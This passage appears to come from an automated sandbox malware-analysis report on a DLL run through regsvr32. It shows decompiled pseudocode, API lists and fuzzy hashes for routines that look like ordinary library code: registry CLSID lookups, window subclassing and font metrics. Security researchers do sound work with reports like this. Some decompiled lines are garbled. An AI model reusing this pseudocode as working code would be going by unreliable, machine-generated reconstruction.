                                                                                                                  • Part of subcall function 10012935: GetWindowRect.USER32 ref: 10012941
                                                                                                                • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 10015FF8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                • String ID: AfxOldWndProc423
                                                                                                                • API String ID: 2702501687-1060338832
                                                                                                                • Opcode ID: 424c9e9bce70c90c35348e3e81b1569fcdc2e45d665c4bac450301485fc4696e
                                                                                                                • Instruction ID: febc920c58330b31607bc6e03b2d61de395114b009de471acd785bc6be4fc9a9
                                                                                                                • Opcode Fuzzy Hash: 424c9e9bce70c90c35348e3e81b1569fcdc2e45d665c4bac450301485fc4696e
                                                                                                                • Instruction Fuzzy Hash: 7031413680011AEBDF01DFA0CD8ADEF7AB8FF49351F054528F601AA0A1D736D952DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100296A0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 61%
                                                                                                                			E100296A0(void* __ebx, signed int __edi, void* __esi, void* _a4, intOrPtr _a8) {
				signed int _v3;
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				intOrPtr _v117;
				signed int _t38;
				signed int _t46;
				int* _t51;

				asm("fisttp dword [ecx]");
				asm("adc [ebx-0x167cefb7], cl");
				asm("adc cl, ch");
				_t46 = __edi ^ _v3;
				_v117();
				_push(_t46);
				_t51 = 0;
				_v12 = 0;
				_v20 = L100011F4(_a8, 0x104);
				_v16 = 0x104;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t38 = RegQueryValueExA(_a4, 0x1009c448, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t51 =  ~_t38 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
				}
				E1000FED3(_a8, 0xffffffff);
				return _t51;
			}













                                                                                                                0x100296a2
                                                                                                                0x100296a4
                                                                                                                0x100296aa
                                                                                                                0x100296ac
                                                                                                                0x100296af
                                                                                                                0x100296ba
                                                                                                                0x100296c0
                                                                                                                0x100296c3
                                                                                                                0x100296cb
                                                                                                                0x100296d7
                                                                                                                0x100296e5
                                                                                                                0x100296ec
                                                                                                                0x100296f6
                                                                                                                0x10029706
                                                                                                                0x10029714
                                                                                                                0x1002971b
                                                                                                                0x10029731
                                                                                                                0x1002973e
                                                                                                                0x10029740
                                                                                                                0x10029741
                                                                                                                0x10029741
                                                                                                                0x10029746
                                                                                                                0x10029746
                                                                                                                0x1002974b
                                                                                                                0x1002974d
                                                                                                                0x10029753
                                                                                                                0x1002975d

                                                                                                                APIs
                                                                                                                • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 100296E8
                                                                                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 100296FC
                                                                                                                • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 10029717
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 10029731
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10029741
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10029746
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 1002974B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$QueryValue
                                                                                                                • String ID: CLSID$InProcServer32
                                                                                                                • API String ID: 3523390698-323508013
                                                                                                                • Opcode ID: 3578df34caa4d2e3dfa6c351421b129961d0aa4c243a6a38072af882a56ef9e0
                                                                                                                • Instruction ID: f2a30076464bdd38d6fdb78a992d83e2900a030fe08d717353393a64dc1c7679
                                                                                                                • Opcode Fuzzy Hash: 3578df34caa4d2e3dfa6c351421b129961d0aa4c243a6a38072af882a56ef9e0
                                                                                                                • Instruction Fuzzy Hash: 9A212772900169BFDF01EFA9CD80CEEBFB9EF456A4F1041A6F909A6120D7319B41DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100296B0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E100296B0(void* __ebx, void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				signed int _t35;
				int* _t44;

				_t44 = 0;
				_v12 = 0;
				_v20 = L100011F4(_a8, 0x104);
				_v16 = 0x104;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t35 = RegQueryValueExA(_a4, 0x1009c448, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t44 =  ~_t35 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
				}
				E1000FED3(_a8, 0xffffffff);
				return _t44;
			}










                                                                                                                0x100296c0
                                                                                                                0x100296c3
                                                                                                                0x100296cb
                                                                                                                0x100296d7
                                                                                                                0x100296e5
                                                                                                                0x100296ec
                                                                                                                0x100296f6
                                                                                                                0x10029706
                                                                                                                0x10029714
                                                                                                                0x1002971b
                                                                                                                0x10029731
                                                                                                                0x1002973e
                                                                                                                0x10029740
                                                                                                                0x10029741
                                                                                                                0x10029741
                                                                                                                0x10029746
                                                                                                                0x10029746
                                                                                                                0x1002974b
                                                                                                                0x1002974d
                                                                                                                0x10029753
                                                                                                                0x1002975d

                                                                                                                APIs
                                                                                                                • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 100296E8
                                                                                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 100296FC
                                                                                                                • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 10029717
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 10029731
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10029741
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10029746
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 1002974B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$QueryValue
                                                                                                                • String ID: CLSID$InProcServer32
                                                                                                                • API String ID: 3523390698-323508013
                                                                                                                • Opcode ID: 81f69cb689f6843a058716a6a0feb26e352c496ef2f3606f2c0e3d5cf5593caa
                                                                                                                • Instruction ID: 31e1e874dfacf024a2a9f9362d9fa2cdaf9cb0843e2b98def9e3b85b75eacc03
                                                                                                                • Opcode Fuzzy Hash: 81f69cb689f6843a058716a6a0feb26e352c496ef2f3606f2c0e3d5cf5593caa
                                                                                                                • Instruction Fuzzy Hash: 421137B690012DBBDF01EF99CD80CEEBFB9EF456A4F104166F919A6120D7319B41DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003DBEC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003DBEC() {
				struct HWND__* _v4;
				void* _v68;
				void* _v76;
				int _t4;
				int _t10;
				struct HDC__* _t15;
				void* _t18;

				_t4 =  *0x100b9b14; // 0xffffffff
				if(_t4 == 0xffffffff) {
					_t15 = GetDC(0);
					_v4 = 0;
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_v68 = SelectObject(_t15, _t18);
					}
					GetCharWidthA(_t15, 0x36, 0x36, 0x100b9b14);
					if(_t18 != 0) {
						SelectObject(_t15, _v76);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t15);
					_t10 =  *0x100b9b14; // 0xffffffff
					return _t10;
				}
				return _t4;
			}










                                                                                                                0x1003dbed
                                                                                                                0x1003dbf5
                                                                                                                0x1003dc1c
                                                                                                                0x1003dc1e
                                                                                                                0x1003dc35
                                                                                                                0x1003dc39
                                                                                                                0x1003dc3f
                                                                                                                0x1003dc3f
                                                                                                                0x1003dc4d
                                                                                                                0x1003dc55
                                                                                                                0x1003dc5c
                                                                                                                0x1003dc5f
                                                                                                                0x1003dc5f
                                                                                                                0x1003dc67
                                                                                                                0x1003dc6d
                                                                                                                0x00000000
                                                                                                                0x1003dc75
                                                                                                                0x1003dc77

                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 1003DBFE
                                                                                                                • GetSystemMetrics.USER32 ref: 1003DC22
                                                                                                                • CreateFontA.GDI32(00000000,?,?,?,?,?,1003F0E1,00001000,?,?,?,?,?,?), ref: 1003DC29
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1003DC3D
                                                                                                                • GetCharWidthA.GDI32(00000000,00000036,00000036,100B9B14), ref: 1003DC4D
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1003DC5C
                                                                                                                • DeleteObject.GDI32(00000000), ref: 1003DC5F
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1003DC67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                                                                • String ID: Marlett
                                                                                                                • API String ID: 1397664628-3688754224
                                                                                                                • Opcode ID: f143f9938d41884723be5508dee54b535352d4842ea16944978db2463053da02
                                                                                                                • Instruction ID: 500abb4394048999830c117a5cab8b51610c075c4a3b407bf1c48366689c28be
                                                                                                                • Opcode Fuzzy Hash: f143f9938d41884723be5508dee54b535352d4842ea16944978db2463053da02
                                                                                                                • Instruction Fuzzy Hash: 3A014C716523307BE2229B669E8CDDB3E6DEF87AE1F000545F20AA2190CB655900C6B4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000A4C7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49registrystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E1000A4C7(void* __ecx, char* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void* _v12;
				void* _t27;
				void* _t28;
				char* _t30;
				void* _t31;
				intOrPtr* _t32;

				_t32 = __imp__CoTreatAsClass;
				_t28 =  *_t32(_a8, _a12, _t27, _t31, __ecx, __ecx);
				if(_t28 != 0 && _a4 != 0) {
					RegOpenKeyA(0x80000000, "CLSID",  &_v12);
					_v8 = _v8 & 0x00000000;
					__imp__StringFromCLSID(_a8,  &_v8);
					_t30 = E10020CCA(_v8);
					RegSetValueA(_v12, _t30, 1, _a4, lstrlenA(_a4));
					__imp__CoTaskMemFree(_t30);
					_t28 =  *_t32(_a8, _a12);
					RegCloseKey(_v12);
				}
				return _t28;
			}










                                                                                                                0x1000a4cd
                                                                                                                0x1000a4dc
                                                                                                                0x1000a4e0
                                                                                                                0x1000a4f6
                                                                                                                0x1000a4fc
                                                                                                                0x1000a507
                                                                                                                0x1000a518
                                                                                                                0x1000a52a
                                                                                                                0x1000a531
                                                                                                                0x1000a542
                                                                                                                0x1000a544
                                                                                                                0x1000a544
                                                                                                                0x1000a54f

                                                                                                                APIs
                                                                                                                • CoTreatAsClass.OLE32(?,?), ref: 1000A4DA
                                                                                                                • RegOpenKeyA.ADVAPI32(80000000,CLSID,00000000), ref: 1000A4F6
                                                                                                                • StringFromCLSID.OLE32(?,00000000), ref: 1000A507
                                                                                                                  • Part of subcall function 10020CCA: CoTaskMemFree.OLE32(00000000), ref: 10020CDB
                                                                                                                • lstrlenA.KERNEL32(00000000,00000000), ref: 1000A51A
                                                                                                                • RegSetValueA.ADVAPI32(00000000,00000000,00000001,00000000,00000000), ref: 1000A52A
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 1000A531
                                                                                                                • CoTreatAsClass.OLE32(?,?), ref: 1000A53D
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1000A544
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassFreeTaskTreat$CloseFromOpenStringValuelstrlen
                                                                                                                • String ID: CLSID
                                                                                                                • API String ID: 2259541326-910414637
                                                                                                                • Opcode ID: 0fb55bce5508f47ccc40d3211df9bbc4f2d4a9c6eba1e501c85bd7d66b1ff4b6
                                                                                                                • Instruction ID: 64bae599c37c4c486c8a5bfdd2905429fbca63f959f3cca092693e514ca3cc27
                                                                                                                • Opcode Fuzzy Hash: 0fb55bce5508f47ccc40d3211df9bbc4f2d4a9c6eba1e501c85bd7d66b1ff4b6
                                                                                                                • Instruction Fuzzy Hash: 7101E976400118FBEF029FA0CD49EEE7FBAEB8A366F104155FA0592120DB719AA4DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100389C8 Relevance: 15.2, APIs: 10, Instructions: 224COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E100389C8(signed int __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t75;
				intOrPtr _t80;
				signed int _t84;
				signed int _t85;
				intOrPtr* _t104;
				void* _t119;
				signed int _t123;
				intOrPtr* _t125;
				void* _t128;
				signed int _t131;
				signed int _t140;
				void* _t142;
				signed int* _t144;
				void* _t178;
				void* _t180;
				signed int _t183;
				void* _t185;
				signed int _t186;
				void* _t188;
				void* _t195;
				signed int _t198;

				_t195 = __eflags;
				_t186 = _t188 - 0x400;
				_t75 =  *0x100b9e70; // 0xbb35530
				 *(_t186 + 0x404) = _t75 ^ _t186;
				_push(0x1c);
				E1004764D(0x10090de9, __ebx, __edi, __esi);
				 *(_t186 - 0x14) =  *(_t186 - 0x14) & 0x00000000;
				_t178 = __ecx;
				_t144 =  *(_t186 + 0x414);
				_t183 =  *_t144;
				 *((intOrPtr*)(_t186 - 0x10)) =  *((intOrPtr*)(_t186 + 0x410));
				_t80 =  *((intOrPtr*)(__ecx + 0x74));
				_t176 =  *(_t80 + 0x34) & 0x00080000;
				 *(_t186 - 0x24) = _t144;
				 *(_t186 - 0x28) =  *(_t80 + 0x34) & 0x00080000;
				_t140 = (__ebx & 0xffffff00 | _t195 != 0x00000000) - 0x00000001 & 0x00000020;
				if(_t183 !=  *((intOrPtr*)(_t80 + 0x1c))) {
					L9:
					_push( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)) + 0x1c)));
					E1000B543(_t140, _t186 - 0x20, _t178, _t183, __eflags);
					 *(_t186 - 4) =  *(_t186 - 4) & 0x00000000;
					__eflags =  *(_t186 - 0x28);
					if(__eflags == 0) {
						_t125 =  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)) + 0x1c));
						while(1) {
							__eflags =  *_t125 - _t140;
							if( *_t125 == _t140) {
								break;
							}
							_t125 = L1004CFCE(_t176, _t178, _t125);
						}
						_t128 = E10027DD9(_t186 - 0x20, _t186 - 0x14, _t125 -  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)) + 0x1c)));
						 *(_t186 - 4) = 1;
						E10018A1F(_t140, _t186 - 0x20, _t186, _t128);
						__eflags =  *(_t186 - 0x14) + 0xfffffff0;
						 *(_t186 - 4) = 0;
						L100013E3( *(_t186 - 0x14) + 0xfffffff0, _t176);
					}
					_push(_t183);
					_t146 = _t186 - 0x18;
					_t179 = _t183;
					E1000B543(_t140, _t186 - 0x18, _t183, _t183, __eflags);
					 *(_t186 - 4) = 2;
					while(1) {
						_t84 =  *_t183;
						__eflags = _t84 - _t140;
						if(_t84 == _t140) {
							break;
						}
						__eflags = _t84;
						if(_t84 != 0) {
							_t123 = L1004CFCE(_t176, _t179, _t183);
							_pop(_t146);
							_t183 = _t123;
							continue;
						}
						break;
					}
					__eflags =  *(_t186 - 0x28);
					if( *(_t186 - 0x28) != 0) {
						L22:
						_t85 = L1004CFCE(_t176, _t179, _t183);
						asm("sbb ecx, ecx");
						_t146 =  ~( *_t85) & _t85;
						__eflags = _t146;
						 *( *(_t186 - 0x24)) = _t146;
					} else {
						__eflags =  *_t183;
						if( *_t183 != 0) {
							_t119 = E10027DD9(_t186 - 0x18, _t186 - 0x14, _t183 - _t179);
							 *(_t186 - 4) = 3;
							E10018A1F(0, _t186 - 0x18, _t186, _t119);
							__eflags =  *(_t186 - 0x14) + 0xfffffff0;
							 *(_t186 - 4) = 2;
							L100013E3( *(_t186 - 0x14) + 0xfffffff0, _t176);
							goto L22;
						} else {
							 *( *(_t186 - 0x24)) = 0;
						}
					}
					_push(E1004DE12(_t146, _t176,  *(_t186 - 0x18), _t186 - 0x1c, 3, _t186 + 0x304, 0x100, _t186 + 0x100, 0x100, _t186, 0x100));
					L1000135C(0, _t146, _t179, 0x100);
					__eflags =  *((char*)(_t186 - 0x1c));
					if( *((char*)(_t186 - 0x1c)) != 0) {
						L26:
						_push(E1004C6C3(_t176, _t186 + 0x200, 0x104,  *(_t186 - 0x18)));
						L1000135C(0, _t146, _t179, 0x100);
					} else {
						__eflags =  *((char*)(_t186 + 0x304));
						if(__eflags != 0) {
							goto L26;
						} else {
							_push(0x1009c950);
							_push(_t186 - 0x20);
							_push(_t186 - 0x14);
							_t104 = L1001AD50(0, _t179, 0x100, __eflags);
							 *(_t186 - 4) = 4;
							_push(E1004DE12(_t186 - 0x1c, _t176,  *_t104, _t186 - 0x1c, 3, _t186 + 0x304, 0x100, 0, 0, 0, 0));
							L1000135C(0, _t186 - 0x1c, _t179, 0x100);
							 *(_t186 - 4) = 2;
							L100013E3( *(_t186 - 0x14) + 0xfffffff0, _t176);
							_push(E1004E033( *(_t186 - 0x14) + 0xfffffff0, _t176, _t186 + 0x200, 0x104, _t186 - 0x1c, _t186 + 0x304, _t186 + 0x100, _t186));
							L1000135C(0,  *(_t186 - 0x14) + 0xfffffff0, _t179, 0x100);
						}
					}
					_push(_t186 + 0x200);
					E1000B543(0,  *((intOrPtr*)(_t186 - 0x10)), _t179, 0x100, __eflags);
					L100013E3( *(_t186 - 0x18) + 0xfffffff0, _t176);
					__eflags =  *((intOrPtr*)(_t186 - 0x20)) + 0xfffffff0;
					L100013E3( *((intOrPtr*)(_t186 - 0x20)) + 0xfffffff0, _t176);
				} else {
					if(( *(_t80 + 0x34) & 0x00000200) != 0) {
						while(1) {
							_t131 =  *_t183;
							__eflags = _t131 - _t140;
							if(_t131 == _t140) {
								break;
							}
							__eflags = _t131;
							if(_t131 != 0) {
								_t183 = L1004CFCE(_t176, _t178, _t183);
								continue;
							}
							break;
						}
						_t183 = L1004CFCE(_t176, _t178, _t183);
						__eflags =  *_t183;
						if(__eflags != 0) {
							goto L9;
						} else {
							 *( *(_t186 - 0x24)) =  *( *(_t186 - 0x24)) & 0x00000000;
							goto L3;
						}
					} else {
						 *_t144 =  *_t144 & 0x00000000;
						_t198 =  *_t144;
						L3:
						_push( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)) + 0x1c)));
						E1000B543(_t140,  *((intOrPtr*)(_t186 - 0x10)), _t178, _t183, _t198);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t186 - 0xc));
				_pop(_t180);
				_pop(_t185);
				_pop(_t142);
				return E1004763E( *((intOrPtr*)(_t186 - 0x10)), _t142,  *(_t186 + 0x404) ^ _t186, _t176, _t180, _t185);
			}

























                                                                                                                0x100389c8
                                                                                                                0x100389cf
                                                                                                                0x100389d3
                                                                                                                0x100389da
                                                                                                                0x100389e0
                                                                                                                0x100389e7
                                                                                                                0x100389ec
                                                                                                                0x100389f6
                                                                                                                0x100389f8
                                                                                                                0x100389fe
                                                                                                                0x10038a00
                                                                                                                0x10038a03
                                                                                                                0x10038a09
                                                                                                                0x10038a14
                                                                                                                0x10038a17
                                                                                                                0x10038a1a
                                                                                                                0x10038a20
                                                                                                                0x10038a69
                                                                                                                0x10038a6c
                                                                                                                0x10038a72
                                                                                                                0x10038a77
                                                                                                                0x10038a7b
                                                                                                                0x10038a7f
                                                                                                                0x10038a84
                                                                                                                0x10038a90
                                                                                                                0x10038a90
                                                                                                                0x10038a92
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10038a8a
                                                                                                                0x10038a8f
                                                                                                                0x10038aa2
                                                                                                                0x10038aab
                                                                                                                0x10038aaf
                                                                                                                0x10038ab7
                                                                                                                0x10038aba
                                                                                                                0x10038abe
                                                                                                                0x10038abe
                                                                                                                0x10038ac3
                                                                                                                0x10038ac4
                                                                                                                0x10038ac7
                                                                                                                0x10038ac9
                                                                                                                0x10038ace
                                                                                                                0x10038ae1
                                                                                                                0x10038ae1
                                                                                                                0x10038ae3
                                                                                                                0x10038ae5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10038ad4
                                                                                                                0x10038ad6
                                                                                                                0x10038ad9
                                                                                                                0x10038ade
                                                                                                                0x10038adf
                                                                                                                0x00000000
                                                                                                                0x10038adf
                                                                                                                0x00000000
                                                                                                                0x10038ad6
                                                                                                                0x10038ae9
                                                                                                                0x10038aec
                                                                                                                0x10038b26
                                                                                                                0x10038b27
                                                                                                                0x10038b31
                                                                                                                0x10038b33
                                                                                                                0x10038b33
                                                                                                                0x10038b38
                                                                                                                0x10038aee
                                                                                                                0x10038aee
                                                                                                                0x10038af0
                                                                                                                0x10038b05
                                                                                                                0x10038b0e
                                                                                                                0x10038b12
                                                                                                                0x10038b1a
                                                                                                                0x10038b1d
                                                                                                                0x10038b21
                                                                                                                0x00000000
                                                                                                                0x10038af2
                                                                                                                0x10038af5
                                                                                                                0x10038af5
                                                                                                                0x10038af0
                                                                                                                0x10038b62
                                                                                                                0x10038b63
                                                                                                                0x10038b6b
                                                                                                                0x10038b6f
                                                                                                                0x10038bf8
                                                                                                                0x10038c0c
                                                                                                                0x10038c0d
                                                                                                                0x10038b75
                                                                                                                0x10038b75
                                                                                                                0x10038b7c
                                                                                                                0x00000000
                                                                                                                0x10038b7e
                                                                                                                0x10038b7e
                                                                                                                0x10038b86
                                                                                                                0x10038b8a
                                                                                                                0x10038b8b
                                                                                                                0x10038ba5
                                                                                                                0x10038bae
                                                                                                                0x10038baf
                                                                                                                0x10038bbd
                                                                                                                0x10038bc1
